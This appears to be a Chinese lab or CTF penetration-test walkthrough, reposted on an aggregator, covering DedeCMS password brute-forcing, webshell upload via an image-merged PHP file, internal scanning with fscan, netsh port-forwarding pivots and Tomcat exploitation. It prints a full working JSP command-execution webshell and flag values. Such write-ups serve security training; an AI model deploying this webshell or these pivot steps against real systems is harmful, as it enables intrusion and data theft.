渗透复现

news2024/11/19 17:37:22

初步接触

先进行主机发现

nmap 172.16.17.0/24 -p 80 先指定扫描80端口的

nmap 172.16.17.0/24

做的时候,一直没有发现之间有一个输入成了逗号

根据上面的结果,就可以知道了

我们会看到有几个open,应该就是这两个了

就会发现是可以的,然后访问看看

177是可以访问的

134出现异常,做的时候以为是一个错的后面就没有想利用了

就先看177的,回到页面,看到底部有一个关键的信息,搜一下看看,加上dede就会发现后台管理页面

抓包爆破一下,就会看到密码是1q2w3e4r 登陆成功

做题的时候sha了 ,没有发现这个答案....

会员中心--内容中心--个人空间--文章发表下,发现了文件上传漏洞

打开会员中心之后,把会员功能打开,找到图像就可以发现上传点了

上传个一句话木马文件上去

发现不可以

其他师傅说需要改后缀

上传一个图片马,用bp抓包,改后缀为p*hp

copy 1.jpg/b+1.php/a 2.jpg

成功回显路径,然后连接不成功,等一下再来看看

在核心的文件式管理器上也发现了,试了一下居然可以成功

蚁剑连接成功就可以看到flag3了,文件路径.....

flag3{cf1e8c14e54505f60aa10ceb8d5d8ab3}

织梦数据库配置文件在/data/common.inc.php,这个也是后面才知道的

然后添加数据,进行连接,连接成功

 有一个答案在dede_admin 下

 在添加配置里面输入相应的内容,flag1就会出现了,在dede库的dede_admin表中有flag1

这两个都比较难找一点

外网的差不多就结束

进入内网的前提也是要知道ip

获取当前主机的ip

 是什么权限,我们用whoami命令

直接就是管理员权限,不需要我们提权

ipconfig

上传 fscan.exe

找到内网ip192.168.31.20

 右键终端中输入命令

-fscan64 -h 192.168.31.20/24

 说明存在内网靶机192.16.31.131

端口转发一下

netsh interface portproxy add v4tov4 listenport=88   connectaddress=192.168.31.131 connectport=80

查看是否设置成功

netsh interface portproxy show all

端口设置成功

 访问88这个端口,访问成功

 Apache Tomcat/8.5.19,直接搜漏洞

88/manger

 被拒绝了

一文了解Tomcat/8.5.19文件上传漏洞复现_tomcat8.5漏洞-CSDN博客

【Tomcat-8.5.19】文件写入漏洞_apache tomcat/8.5.19_夭-夜的博客-CSDN博客

上传jsp一句话木马


<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>

刷新抓包加上以上的东西,再修改一下

上传成功

  ls /

 

 

flag11{8f72e28063c30c7468fb6af4653f4f9c}

 再访问另外一个端口

 【漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞_minio漏洞-CSDN博客

 照着来了一下,结果...

需要改一下端口

netsh interface portproxy add v4tov4 listenport=7777  connectaddress=192.168.31.131 connectport=9001

 然后还是访问不行

记得之前还有一个ip   172.16.17.134

用dirsearch扫一下看看

发现了一些文件,但是和windows上扫出来的结果有点不一样,有个l.php漏了

底部有一个mysql连接

 

 弱口令root/root

 刚刚扫的时候还发现/phpMyAdmin/,访问一下看看

 root/root    成功进入

 

 又是在页面上

在数据库中发现了

 还有一个shell.php,访问看看,出现了一堆东西

 

 感觉像是一些查询语句

newyxcms出现较多,搜索看看,真的挺多的

 万万没有想到还有个yxcms的目录,没有想到和这个居然有联系

 小心网站页面,应该还会有信息,果然

 注意要是改成admin,才能输入

 

 ss 一下

 

 

 提示说上传的文件会在default的文件夹下

不知道路径,御剑扫一下

 网站下面有个beifen.rar,访问就可以下载

 文件上传的路径点在\yxcms\protected\apps\default\view\default

 上传成功

 蚁剑连接成功

 

 在以下路径发现答案

 

 监听和后面的横向移动还需要理解,目前还是...

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1282941.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MVCC是如何保证隔离性的

之前提到了MVCC可以一定程度上避免幻读&#xff0c;那具体MVCC是咋工作的呢&#xff1f; 需要介绍两个机制&#xff1a;read view和聚簇索引的两个隐藏列 read view 这个就是我们理解的快照&#xff0c;有四个字段&#xff0c;本事务id、活跃事务id列表&#xff08;包含自己&…

Biglnteger 和 BigDecimal类 - Java

BigInteger 和 BigDecimal类 1、应用场景 BigInteger 适合保存比较大的整型BigDecimal 适合保存精度更高的浮点型(小数) 2、BigInteger 当编程中需要处理很大的整数&#xff0c;long 不够用&#xff0c;就需要使用 Biglnteger 类。 使用 //创建&#xff1a;和类一样&…

手机传输数据到电脑该怎么操作?安卓、苹果都可以这样操作

安卓手机 你知道安卓手机传输数据到电脑的方法有哪些吗&#xff1f;下面我们就一起来看一看可以使用的一些方法。 采用 USB 数据线 这个方法应该是我们生活中较为常见的方法了&#xff0c;我们只需要使用手机的充电线&#xff0c;将其连接到电脑上&#xff0c;然后手机可能会…

网工学习7-配置 GVRP 协议

7.1GARP概述 GARP(Generic Attribute Registration Protocol)是通用属性注册协议的应用&#xff0c;提供 802.1Q 兼容的 VLAN 裁剪 VLAN pruning 功能和在 802.1Q 干线端口 trunk port 上建立动态 VLAN 的功能。 GARP 作为一个属性注册协议的载体&#xff0c;可以用来传播属性…

医药行业:轻松学会超低温冰箱技能

超低温冰箱在医疗、科研和生物领域中扮演着至关重要的角色&#xff0c;用于存储和保护对温度极为敏感的样品和药品。 然而&#xff0c;由于这些冰箱内的温度波动可能导致样品的损坏&#xff0c;因此对超低温冰箱的监控变得至关重要。 客户案例 医疗研究机构 上海某医疗研究机…

行业分析:全球山药产量约为7603.1万吨

山药味甘&#xff0c;性平。常被认为有健脾、益肺、固肾、涩精等功效。作为食用&#xff0c;山药所含的膳食纤维丰富&#xff0c;相比精细主食&#xff0c;如大米苗条等&#xff0c;更有饱腹感&#xff0c;对于控制食欲和体重有很好的辅助作用。另外&#xff0c;其所含的淀粉酶…

如何在Linux上搭建本地Docker Registry镜像仓库并实现公网访问

Linux 本地 Docker Registry本地镜像仓库远程连接 文章目录 Linux 本地 Docker Registry本地镜像仓库远程连接1. 部署Docker Registry2. 本地测试推送镜像3. Linux 安装cpolar4. 配置Docker Registry公网访问地址5. 公网远程推送Docker Registry6. 固定Docker Registry公网地址…

万兆多模光模块SFP-10G-SR:高速短距传输的最优选

随着信息技术的发展&#xff0c;企业和个人对数据传输速度和带宽需求不断增加。传统的千兆以太网已经不能满足高速数据传输的要求&#xff0c;因此万兆以太网技术崭露头角。作为万兆以太网中的重要组件之一&#xff0c;万兆多模SFP-10G-SR光模块引起了广泛的关注。本文将介绍万…

Latex去掉参考文献后面的参考文献所在页(去掉参考文献的反向超链接)

如下&#xff1a; 在使用latex插入参考文献的时候&#xff0c;最后面总是会出现这种代号。这是表明的是这条参考文献所在的页码&#xff0c;并且点击之后可以跳转到该页。正式来讲&#xff0c;这个叫超链接的BACKREF。若要去掉&#xff0c;只需要在引用hyperref的时候去掉page…

MYSQL练题笔记-聚合函数-各赛事的用户注册率

一、题目相关内容 1&#xff09;相关的表 2&#xff09;题目 3&#xff09;帮助理解题目的示例&#xff0c;提供返回结果的格式 二、自己初步的理解 有两张不同左右的表&#xff0c;用户表和赛事注册表。然后解题。 1.各种赛事的用户注册百分率 各种赛事的意味着通过contes…

Spring 声明式事务

Spring 声明式事务 1.Spring 事务管理概述1.1 事务管理的重要性1.2 Spring事务管理的两种方式1.2.1 编程式事务管理1.2.2 声明式事务管理 1.3 为什么选择声明式事务管理 2. 声明式事务管理2.1 基本用法2.2 常用属性2.2.1 propagation&#xff08;传播行为&#xff09;2.2.2 iso…

希宝猫罐头怎么样?专业人士告诉你营养好的猫罐头推荐

作为一个6年铲屎官来说&#xff0c;买过的猫罐头可以说是不计其数啦。对于猫罐头品牌选购和喂养相关知识&#xff0c;我还是有点心得的。希宝猫罐头怎么样呢&#xff1f; 希宝猫罐头采用了先进的加工工艺&#xff0c;注重产品的包装和密封性&#xff0c;包装设计比较符合年轻人…

年底了,项目预算怎么创建?9个步骤直接搞定

如果将项目比作一辆汽车&#xff0c;那么预算就是它的燃料。就像汽车需要汽油一样&#xff0c;项目也需要资金和资源来维持运转。而作为项目经理&#xff0c;应该尽量用最有效的方式规划和使用这些资源&#xff0c;使项目按时交付。 项目预算是一项计划&#xff0c;其中详细说…

使用Plex结合cpolar搭建本地私人媒体站并实现远程访问

文章目录 1.前言2. Plex网站搭建2.1 Plex下载和安装2.2 Plex网页测试2.3 cpolar的安装和注册 3. 本地网页发布3.1 Cpolar云端设置3.2 Cpolar本地设置 4. 公网访问测试5. 结语 1.前言 用手机或者平板电脑看视频&#xff0c;已经算是生活中稀松平常的场景了&#xff0c;特别是各…

使用Java语言判断一个数据类型是奇数还是偶数

判断一个数字类型是奇数&#xff0c;还是偶数&#xff0c;只需要引入Scanner类&#xff0c;然后按照数据类型的定义方式进行定义&#xff0c;比较是按照与2进行整除后的结果&#xff1b;如果余数为零&#xff0c;则代表为偶数&#xff0c;否则为奇数。 import java.util.Scann…

学习php中使用composer下载安装firebase/php-jwt 以及调用方法

学习php中使用composer下载安装firebase/php-jwt 以及调用方法 1、安装firebase/php-jwt2、封装jwt类 1、安装firebase/php-jwt composer require firebase/php-jwt安装好以后出现以下文件: 2、封装jwt类 根据所使用的php框架&#xff0c;在指定目录创建 Token.php <?ph…

对小工蚁关于LLM的技术总结+个人思考

LLM能力从何而来&#xff1a; 推理能力&#xff1f;目前还未知晓为何得到结果 斯坦福大学的AI指数 通过种子任务自动生成数据训练LLM 基于self-instruct及175条种子任务生成数据。 LLM大模型如何进行微调&#xff1f; 1.blog/trl-peft.md at main huggingface/blog GitH…

2024 年甘肃省职业院校技能大赛中职组 电子与信息类“网络安全”赛项竞赛样题-A

2024 年甘肃省职业院校技能大赛中职组 电子与信息类“网络安全”赛项竞赛样题-A 目录 2024 年甘肃省职业院校技能大赛中职组 电子与信息类“网络安全”赛项竞赛样题-A 需要环境或者解析可以私信 &#xff08;二&#xff09;A 模块基础设施设置/安全加固&#xff08;200 分&…

【跨境营商】创新科技助力数码转型 增强大湾区企业核心竞争力

粤港澳大湾区作为国家的重点发展区域&#xff0c;坐拥丰富的资源及商机&#xff0c;企业积极推行数码化&#xff0c;务求在大湾区抢占先机。香港电讯商业客户业务董事总经理吴家隆表示&#xff0c;近年企业锐意加快数码化步伐&#xff0c;香港电讯以创新科技融入的数码方案&…